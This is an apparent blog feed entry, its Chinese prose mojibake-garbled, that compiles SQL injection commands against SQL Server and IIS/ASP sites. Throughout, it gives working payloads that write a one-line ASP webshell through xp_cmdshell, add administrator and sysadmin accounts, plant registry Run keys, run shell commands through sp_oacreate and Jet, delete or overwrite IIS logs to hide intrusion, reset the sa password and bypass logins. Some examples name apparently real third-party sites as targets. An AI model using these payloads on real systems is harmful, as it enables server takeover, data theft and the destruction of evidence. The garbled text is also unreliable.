锘??xml version="1.0" encoding="utf-8" standalone="yes"?>一区在线影院,国产午夜精品麻豆,欧美高清在线一区二区http://www.shnenglu.com/elva/category/4146.htmlzh-cnWed, 21 May 2008 07:47:35 GMTWed, 21 May 2008 07:47:35 GMT60鏈璇︾粏鐨凷QL娉ㄥ叆鐩稿叧鐨勫懡浠ゆ暣鐞?http://www.shnenglu.com/elva/archive/2007/10/22/34820.html鍙跺瓙鍙跺瓙Mon, 22 Oct 2007 01:41:00 GMThttp://www.shnenglu.com/elva/archive/2007/10/22/34820.htmlhttp://www.shnenglu.com/elva/comments/34820.htmlhttp://www.shnenglu.com/elva/archive/2007/10/22/34820.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/34820.htmlhttp://www.shnenglu.com/elva/services/trackbacks/34820.htmlQUOTE:
1銆?  鐢╚杞箟瀛楃鏉ュ啓ASP(涓鍙ヨ瘽鏈ㄩ┈)鏂囦歡鐨勬柟娉?
?   http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--

?   echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp

2銆?  鏄劇ずSQL緋葷粺鐗堟湰錛?
?   http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
?   http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)--

Microsoft VBScript 緙栬瘧鍣ㄩ敊璇?閿欒 '800a03f6'
緙哄皯 'End'
/iisHelp/common/500-100.asp錛岃242
Microsoft OLE DB Provider for ODBC Drivers 閿欒 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/display.asp錛岃17
3銆?  鍦ㄦ嫻嬬儲灝間腑鍥界殑緗戠珯婕忔礊鏃訛紝鍒嗘槑宸茬粡紜畾浜嗘紡媧炲瓨鍦ㄥ嵈鏃犳硶鍦ㄨ繖涓夌婕忔礊涓壘鍒板搴旂殑綾誨瀷銆傚伓鐒墮棿鎴戞兂鍒頒簡鍦⊿QL璇█涓彲浠ヤ嬌鐢?#8220;in”鍏抽敭瀛楄繘琛屾煡璇紝渚嬪“select * from mytable where id in(1)”錛屾嫭鍙蜂腑鐨勫煎氨鏄垜浠彁浜ょ殑鏁版嵁錛屽畠鐨勭粨鏋滀笌浣跨敤“select * from mytable where id=1”鐨勬煡璇㈢粨鏋滃畬鍏ㄧ浉鍚屻傛墍浠ヨ闂〉闈㈢殑鏃跺欏湪URL鍚庨潰鍔犱笂“) and 1=1 and 1 in(1”鍚庡師鏉ョ殑SQL璇彞灝卞彉鎴愪簡“select * from mytable where id in(1) and 1=1 and 1 in(1)”錛岃繖鏍峰氨浼氬嚭鐜版湡寰呭凡涔呯殑欏甸潰浜嗐傛殏涓斿氨鍙繖縐嶇被鍨嬬殑婕忔礊涓?#8220;鍖呭惈鏁板瓧鍨?#8221;鍚э紝鑱槑鐨勪綘涓瀹氭兂鍒頒簡榪樻湁“鍖呭惈瀛楃鍨?#8221;鍛€傚浜嗭紝瀹冨氨鏄敱浜庣被浼?#8220;select * from mytable where name in(‘firstsee’)”鐨勬煡璇㈣鍙ラ犳垚鐨勩?br>
4銆?  鍒ゆ柇xp_cmdshell鎵╁睍瀛樺偍榪囩▼鏄惁瀛樺湪錛?br>http://192.168.1.5/display.asp?keyno=188 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')
鎭㈠xp_cmdshell鎵╁睍瀛樺偍鐨勫懡浠わ細
http://www.test.com/news/show1.asp?NewsId=125272
;exec master.dbo.sp_addextendedproc 'xp_cmdshell',’e:\inetput\web\xplog70.dll’;--

5銆?  鍚戝惎鍔ㄧ粍涓啓鍏ュ懡浠よ鍜屾墽琛岀▼搴忥細
http://192.168.1.5/display.asp?keyno=188;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'


6銆?  鏌ョ湅褰撳墠鐨勬暟鎹簱鍚嶇О錛?br>?   http://192.168.1.5/display.asp?keyno=188 and 0<>db_name(n) n鏀規垚0,1,2,3……灝卞彲浠ヨ法搴撲簡
?   http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name())--
Microsoft VBScript 緙栬瘧鍣ㄩ敊璇?閿欒 '800a03f6'
緙哄皯 'End'
/iisHelp/common/500-100.asp錛岃242
Microsoft OLE DB Provider for ODBC Drivers 閿欒 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'huidahouse' to a column of data type int.
/display.asp錛岃17
7銆?  鍒楀嚭褰撳墠鎵鏈夌殑鏁版嵁搴撳悕縐幫細
select * from master.dbo.sysdatabases   鍒楀嚭鎵鏈夊垪鐨勮褰?br>select name from master.dbo.sysdatabases 浠呭垪鍑簄ame鍒楃殑璁板綍

8銆?  涓嶉渶xp_cmdshell鏀寔鍦ㄦ湁娉ㄥ叆婕忔礊鐨凷QL鏈嶅姟鍣ㄤ笂榪愯CMD鍛戒護錛?br>CREATE TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:\>c:\temp.txt','0','true'
--娉ㄦ剰run鐨勫弬鏁皌rue鎸囩殑鏄皢絳夊緟紼嬪簭榪愯鐨勭粨鏋滐紝瀵逛簬綾諱技ping鐨勯暱鏃墮棿鍛戒護蹇呴渶浣跨敤姝ゅ弬鏁般?br>
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
--鍥犱負fso鐨刼pentextfile鏂規硶灝嗚繑鍥炰竴涓猼extstream瀵硅薄錛屾墍浠ユ鏃禓file鏄竴涓璞′護鐗?br>
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
INSERT INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END

DROP TABLE MYTMP

----------
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true'
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
INSERT INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END

浠ヤ笅鏄竴琛岄噷闈㈠皢WEB鐢ㄦ埛鍔犲埌綆$悊鍛樼粍涓細
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

浠ヤ笅鏄竴琛屼腑鎵цEXE紼嬪簭錛?br>DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

SQL涓嬩笁縐嶆墽琛孋MD鍛戒護鐨勬柟娉曪細

鍏堝垹闄?.18鍙鋒棩蹇楋細
(1)exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt'

(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

錛?錛夐鍏堝紑鍚痡et娌欑洏妯″紡錛岄氳繃鎵╁睍瀛樺偍榪囩▼xp_regwrite淇敼娉ㄥ唽琛ㄥ疄鐜幫紝綆$悊鍛樹慨鏀規敞鍐岃〃涓嶈兘棰勯槻鐨勫師鍥犮傚嚭浜庡畨鍏ㄥ師鍥狅紝榛樿娌欑洏妯″紡鏈紑鍚紝榪欏氨鏄負浠涔堥渶瑕亁p_regwrite鐨勫師鍥狅紝鑰寈p_regwrite鑷沖皯闇瑕丏B_OWNER鏉冮檺錛屼負浜嗘柟渚匡紝榪欓噷寤鴻浣跨敤sysadmin鏉冮檺嫻嬭瘯錛?br>?   exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
娉細
0   紱佹涓鍒囷紙榛樿錛?br>1   浣胯兘璁塊棶ACCESS錛屼絾鏄姝㈠叾瀹?br>2   紱佹璁塊棶ACCESS錛屼絾鏄嬌鑳藉叾浠?br>3   浣胯兘涓鍒?br>
?   榪欓噷浠呯粰鍑簊ysadmin鏉冮檺涓嬩嬌鐢ㄧ殑鍛戒護錛?br>select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')


?   寤虹珛閾炬帴鏁版嵁搴?L0op8ack'鍙傝冨懡浠わ細
EXEC sp_addlinkedserver 'L0op8ack','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:\windows\system32\ias\ias.mdb'

?   濡備綍浣跨敤閾炬帴鏁版嵁搴擄細

浣跨敤榪欎釜鏂瑰紡鍙互鎵ц錛屼絾鏄緢涓嶅垢錛孌B_OWNER鏉冮檺鏄笉澶熺殑錛岄渶瑕佽嚦灝憇ysadmin鏉冮檺鎴栬卻ecurityadmin+setupadmin鏉冮檺緇勫悎
sp_addlinkedserver闇瑕乻ysadmin鎴杝etupadmin鏉冮檺
sp_addlinkedsrvlogin闇瑕乻ysadmin鎴杝ecurityadmin鏉冮檺
鏈緇堝彂鐜幫紝榪樻槸sa鏉冮檺鎴栬卻etupadmin+securityadmin鏉冮檺甯愭埛鎵嶈兘浣跨敤錛?br>涓鑸病鏈夊摢涓鐞嗗憳榪欎箞璁劇疆鏅氬笎鎴鋒潈闄愮殑

瀹炵敤鎬т笉寮猴紝浠呬綔涓轟竴涓涔犳葷粨鍚?br>
澶ц嚧榪囩▼濡備笅錛屽鏋滀笉鏄痵ysadmin錛岄偅涔圛AS.mdb鏉冮檺楠岃瘉浼氬嚭閿欙紝
鎴戞祴璇曠殑鏃跺欐巿浜坔acker榪欎釜鐢ㄦ埛setupadmin+securityadmin鏉冮檺錛屼嬌鐢╥as.mdb澶辮觸
闇瑕佹壘涓涓竴鑸敤鎴峰彲璁塊棶鐨刴db鎵嶅彲浠ワ細

?   鏂板緩閾炬帴鏈嶅姟鍣?#8221;L0op8ack”:EXEC sp_addlinkedserver 'L0op8ack','JetOLEDB','Microsoft.Jet.OLEDB.4.0','c:\winnt\system32\ias\ias.mdb';--
?   exec sp_addlinkedsrvlogin 'L0op8ack','false';--鎴?br>exec sp_addlinkedsrvlogin 'L0op8ack', 'false', NULL, 'test1', 'ptlove';--
?   SELECT * FROM OPENQUERY(L0op8ack, 'SELECT shell("cmd.exe /c net user")');--
?   exec sp_droplinkedsrvlogin 'L0op8ack','false';--
?   exec sp_dropserver 'L0op8ack';--

鍐嶈冭礉涓涓叾瀹冩枃浠舵潵浠f浛7.18鏃ユ枃浠訛細
(1)exec master.dbo.xp_cmdshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt'

(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

(3)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c net user>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

9銆?  鐢║PDATE鏉ユ洿鏂拌〃涓殑鏁版嵁錛?br>HTTP://xxx.xxx.xxx/abc.asp?p=YY;update upload.dbo.admin set pwd='a0b923820dcc509a' where username='www';--
www鐢ㄦ埛瀵嗙爜鐨?6浣峂D5鍊間負錛歛0b923820dcc509a錛屽嵆鎶婂瘑鐮佹敼鎴?錛?br>32浣峂D5鍊間負錛?  錛屽瘑鐮佷負

10銆?  鍒╃敤琛ㄥ唴瀹瑰鎴愭枃浠跺姛鑳?br>SQL鏈塀CP鍛戒護錛屽畠鍙互鎶婅〃鐨勫唴瀹瑰鎴愭枃鏈枃浠跺茍鏀懼埌鎸囧畾浣嶇疆銆傚埄鐢ㄨ繖欏瑰姛鑳斤紝鎴戜滑鍙互鍏堝緩涓寮犱復鏃惰〃錛岀劧鍚庡湪琛ㄤ腑涓琛屼竴琛屽湴杈撳叆涓涓狝SP鏈ㄩ┈錛岀劧鍚庣敤BCP鍛戒護瀵煎嚭褰㈡垚ASP鏂囦歡銆?br>鍛戒護琛屾牸寮忓涓嬶細
bcp "select * from temp " queryout c:\inetpub\wwwroot\runcommand.asp –c –S localhost –U sa –P upload('S'鍙傛暟涓烘墽琛屾煡璇㈢殑鏈嶅姟鍣紝'U'鍙傛暟涓虹敤鎴峰悕錛?P'鍙傛暟涓哄瘑鐮侊紝鏈緇堜笂浼犱簡涓涓猺uncommand.asp鐨勬湪椹?銆?br>
11銆佸垱寤鴻〃銆佹挱鍏ユ暟鎹拰璇誨彇鏁版嵁鐨勬柟娉?br>?   鍒涘緩琛細
' and 1=1 union select 1,2,3,4;create table [dbo].[cyfd]([gyfd][char](255))--
?   寰琛ㄩ噷鎾叆鏁版嵁錛?br>' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) select top 1 name from upload.dbo.sysobjects where xtype='U' and status>0,@result output insert into cyfd (gyfd) values(@result);--
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
?   浠庤〃閲岃鍙栨暟鎹細
' and 1=(select count(*) from cyfd where gyfd >1)--

?   鍒犻櫎涓存椂琛細
';drop table cyfd;--

12銆侀氳繃SQL璇彞鐩存帴鏇存敼sa鐨勫瘑鐮侊細
?   update master.dbo.sysxlogins set password=0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid=0x01,榪欐牱sa鐨勫瘑鐮佸氨琚垜浠敼鎴愪簡111111鎷夈傚懙鍛碉紝瑙e喅鐨勬柟娉曞氨鏄妸sa緇欏垹鎷夈傦紝鎬庝箞鍒犲彲浠ュ弬鑰冩垜鐨勩婂畬鍏ㄥ垹闄a榪欎釜鍚庨棬銆嬨?br>
?   鏌ョ湅鏈満鎵鏈夌殑鏁版嵁搴撶敤鎴峰悕錛?br>select * from master.dbo.sysxlogins
select name,sid,password ,dbid from master.dbo.sysxlogins

?   鏇存敼sa鍙d護鏂規硶錛氱敤sql緇煎悎鍒╃敤宸ュ叿榪炴帴鍚庯紝鎵ц鍛戒護錛?br>exec sp_password NULL,'鏂板瘑鐮?,'sa'

13銆佹煡璇vbbs搴撲腑鎵鏈夌殑琛ㄥ悕鍜岃〃緇撴瀯錛?br>?   select * from dvbbs.dbo.sysobjects where xtype='U' and status>0
?   select * from dvbbs.dbo.syscolumns where id=1426104121

14銆佹墜宸ュ浠藉綋鍓嶆暟鎹簱錛?br>瀹屽叏澶囦喚錛?br>;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH formAT--
宸紓澶囦喚錛?br>;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH DIFFERENTIAL,formAT鈥?br>
15銆佹坊鍔犲拰鍒犻櫎涓涓猄A鏉冮檺鐨勭敤鎴穞est錛?br>exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin

cmd.exe /c isql -E /U alma /P /i K:\test.qry

16銆乻elect * from ChouYFD.dbo.sysobjects where xtype='U' and status>0
灝卞彲浠ュ垪鍑哄簱ChouYFD涓墍鏈夌殑鐢ㄦ埛寤虹珛鐨勮〃鍚嶃?br>Select name,id from ChouYFD.dbo.sysobjects where xtype='U' and status>0

17銆?br>?   http://www.npc.gov.cn/zgrdw/common/image_view.jsp?sqlstr=select * from rdweb.dbo.syscolumns 錛坵here id=1234錛?br>鍒楀嚭rdweb搴撲腑鎵鏈夎〃涓殑瀛楁鍚嶇О
?   select * from dvbbs.dbo.syscolumns where id=5575058
鍒楀嚭搴揹vbbs涓〃id=5575058鐨勬墍鏈夊瓧孌靛悕

18銆佸垹闄よ褰曞懡浠わ細delete from Dv_topic where boardid=5 and topicid=7978

19銆佺粫榪囩櫥褰曢獙璇佽繘鍏ュ悗鍙扮殑鏂規硶鏁寸悊錛?br>1) ' or''='
2) ' or 1=1--
3) ‘ or ‘a’=’a--
4) ‘or’=’or’
5) " or 1=1--
6錛塷r 1=1--
7錛?or ’a=’a
8錛? or "a"="a
9錛?’) or (’a’=’a
10錛?") or ("a"="a
11錛?錛?or (1=1
12) 'or''='
13) 浜烘皵%’ and 1=1 and ’%’=’

20銆佸鎵劇綉绔欒礬寰勭殑鏂規硶姹囨伙細
1錛夋煡鐪媁EB緗戠珯瀹夎鐩綍鍛戒護錛?br>?   cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root >c:\test1.txt 錛堝皢2鎹㈡垚1銆?銆?銆?璇曡瘯錛?br>type c:\test1.txt
del c:\test1.txt
鍦∟BSI涓嬪彲浠ョ洿鎺ユ樉紺鴻繍琛岀粨鏋滐紝鎵浠ヤ笉鐢ㄥ鍑哄埌鏂囦歡

2錛夊湪緗戠珯涓婇殢渚挎壘鍒頒竴涓浘鐗囩殑鍚嶅瓧 123.jpg
鐒跺悗鍐欒繘鎵瑰鐞嗙▼搴?23.bat:
d:
dir 123.jpg /s >c:\123.txt
e:
dir 123.jpg /s >>c:\123.txt
f:
dir 123.jpg /s >>c:\123.txt

鎵ц鍚?type c:\123.txt
榪欐牱鏉ュ垎鏋愮綉绔欑殑璺緞

3錛塖QL鏈嶅姟鍣ㄥ拰緗戠珯鏈嶅姟鍣ㄥ湪鍚屼竴涓湇鍔″櫒涓婏紝濂戒簡鏄彲浠ユ墽琛屽懡浠ゆ槸鍚э紵
灝嗘墽琛屽懡浠よ緭鍑虹粨鏋滃埌
%windir%\help\iishelp\common\404b.htm鎴栬?00.asp
娉ㄦ剰杈撳嚭鍓岯ackup榪欎袱涓枃浠?br>濡傦細
dir c:\ >%windir%\help\iishelp\common\404b.htm
鐒跺悗闅忎究杈撳叆涓涓枃浠舵潵璁塊棶錛歨ttp://鐩爣ip/2.asp

4錛夐拡瀵箇in2000緋葷粺錛歺p_regread璇誨彇HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots 鑾峰彇WEB璺緞
2003緋葷粺錛歺p_regread璇誨彇錛屾湭鎵懼埌鏂規硶
濡傦細
錛?錛?  鏂板緩涓涓〃cyfd(瀛楁涓篻yfd)錛?a target=_blank>http://www.cnwill.com/NewsShow.aspx?id=4844;create table [dbo].[cyfd]([gyfd][char](255))--
錛?錛?  鎶妛eb璺緞鍐欒繘鍘?http://www.cnwill.com/NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
錛?錛?  榪樻槸璁╀粬涓嶅尮閰嶏紝鏄劇ず閿欒:http://www.cnwill.com/NewsShow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd >1)
Source: .Net SqlClient Data Provider
Description: 灝?varchar 鍊?'Y:\Web\鐑熷彴浜烘墠鐑嚎鍚庡彴綆$悊緋葷粺,,201 ' 杞崲涓烘暟鎹被鍨嬩負 int 鐨勫垪鏃跺彂鐢熻娉曢敊璇?br>TargeSite: Boolean Read() 鍝堝搱鍝堛傘傝礬寰勬毚闇蹭簡銆傘?br>錛?錛夋帴涓嬫潵鍒犻櫎琛?http://www.cnwill.com/NewsShow.aspx?id=4844;drop table cyfd;--

5錛夌敤regedit鍛戒護瀵煎嚭娉ㄥ唽琛紝灝嗗鍑虹殑緇撴灉淇濆瓨鐨勮礬寰勫埌%windir%\help\iishelp\common\404b.htm鎴栬?00.asp欏甸潰
regedit鍛戒護璇存槑錛?br>Regedit /L:system /R:user /E filename.reg Regpath
鍙傛暟鍚箟錛?br>/L錛歴ystem鎸囧畾System.dat鏂囦歡鎵鍦ㄧ殑璺緞銆?br>/R錛歶ser鎸囧畾User.dat鏂囦歡鎵鍦ㄧ殑璺緞銆?br>/E錛氭鍙傛暟鎸囧畾娉ㄥ唽琛ㄧ紪杈戝櫒瑕佽繘琛屽鍑烘敞鍐岃〃鎿嶄綔錛屽湪姝ゅ弬鏁板悗闈㈢┖涓鏍鹼紝杈撳叆瀵煎嚭娉ㄥ唽琛ㄧ殑鏂囦歡鍚嶃?br>Regpath錛氱敤鏉ユ寚瀹氳瀵煎嚭鍝釜娉ㄥ唽琛ㄧ殑鍒嗘敮錛屽鏋滀笉鎸囧畾錛屽垯灝嗗鍑哄叏閮ㄦ敞鍐岃〃鍒嗘敮銆傚湪榪欎簺鍙傛暟涓紝"/L錛歴ystem"鍜?/R錛歶ser"鍙傛暟鏄彲閫夐」錛屽鏋滀笉浣跨敤榪欎袱涓弬鏁幫紝娉ㄥ唽琛ㄧ紪杈戝櫒鍒欒涓烘槸瀵?a class=wordstyle target=_blank>WINDOWS鐩綍涓嬬殑"system.dat"鍜?user.dat"鏂囦歡榪涜鎿嶄綔銆傚鏋滄槸閫氳繃浠庤蔣鐩樺惎鍔ㄥ茍榪涘叆DOS錛岄偅涔堝氨蹇呴』浣跨敤"/L"鍜?/R"鍙傛暟鏉ユ寚瀹?system.dat"鍜?user.dat"鏂囦歡鐨勫叿浣撹礬寰勶紝鍚﹀垯娉ㄥ唽琛ㄧ紪杈戝櫒灝嗘棤娉曟壘鍒板畠浠傛瘮濡傝錛屽鏋滈氳繃鍚姩鐩樿繘鍏OS錛屽垯澶囦喚娉ㄥ唽琛ㄧ殑鍛戒護鏄?Regedit /L:C:\windows\/R:C:\windows\/e regedit.reg",璇ュ懡浠ょ殑鎰忔濇槸鎶婃暣涓敞鍐岃〃澶囦喚鍒?a class=wordstyle target=_blank>WINDOWS鐩綍涓嬶紝鍏舵枃浠跺悕涓?regedit.reg"銆傝屽鏋滆緭鍏ョ殑鏄?regedit /E D:\regedit.reg"榪欐潯鍛戒護錛屽垯鏄鎶婃暣涓敞鍐岃〃澶囦喚鍒癉鐩樼殑鏍圭洰褰曚笅錛堢渷鐣ヤ簡"/L"鍜?/R"鍙傛暟錛夛紝鍏舵枃浠跺悕涓?Regedit.reg"銆?br>
regedit /s c:\adam.reg 錛堝鍏:\adam.reg鏂囦歡鑷蟲敞鍐岃〃錛?br>regedit /e c:\web.reg 錛堝浠藉叏閮ㄦ敞鍐屽唴瀹瑰埌c:\web.reg涓級
閽堝win2000緋葷粺錛欳:\>regedit /e %windir%\help\iishelp\common\404b.htm "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots"
鐒跺悗http://鐩爣IP/2.asp
閽堝win2003緋葷粺錛氭病鏈夋壘鍒幫紝甯屾湜鎵懼埌鐨勬湅鍙嬪叕甯冨嚭鏉ヤ竴璧瘋璁恒?br>
6錛夎櫄鎷熶富鏈轟笅%SystemRoot%\system32\inetsrv\MetaBack\涓嬬殑鏂囦歡鏄痠is鐨勫浠芥枃浠訛紝鏄厑璁竪eb鐢ㄦ埛璁塊棶鐨勶紝濡傛灉浣犵殑iis澶囦喚鍒拌繖閲岋紝鐢╳ebshell涓嬭澆涓嬫潵鍚庣敤璁頒簨鏈墦寮錛屽彲浠ヨ幏鍙栧搴旂殑鍩熷悕鍜寃eb緇濆璺緞銆?br>
7錛塖QL娉ㄥ叆寤虹珛铏氭嫙鐩綍錛屾湁dbo鏉冮檺涓嬫壘涓嶅埌web緇濆璺緞鐨勪竴縐嶈В鍐沖姙娉曪細
鎴戜滑寰堝鎯呭喌涓嬮兘閬囧埌SQL娉ㄥ叆鍙互鍒楃洰褰曞拰榪愯鍛戒護錛屼絾鏄嵈寰堜笉瀹規槗鎵懼埌web鎵鍦ㄧ洰褰曪紝涔熷氨涓嶅ソ寰楀埌涓涓獁ebshell錛岃繖涓鎷涗笉閿欙細
?   寤虹珛铏氭嫙鐩綍win,鎸囧悜c:\winnt\system32錛歟xec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
?   璁﹚in鐩綍鍏鋒湁瑙f瀽asp鑴氭湰鏉冮檺錛歟xec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/win/Accessexecute "true" –s:'
?   鍒犻櫎铏氭嫙鐩綍win錛歟xec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/'
?   嫻嬭瘯錛?a target=_blank>http://127.0.0.1/win/test.asp
8錛夊埄鐢⊿QL璇彞鏉ユ煡鎵網EB鐩綍錛氭牴鎹粡楠岋紝鐚滅枒WEB鏍圭洰褰曠殑欏哄簭鏄細d鐩樸乪鐩樸乧鐩橈紝棣栧厛鎴戜滑寤虹珛涓涓復鏃惰〃鐢ㄤ簬瀛樻斁master..xp_dirtree(閫傚悎浜巔ublic)鐢熸垚鐨勭洰褰曟爲,鐢ㄤ互涓嬭鍙ワ細
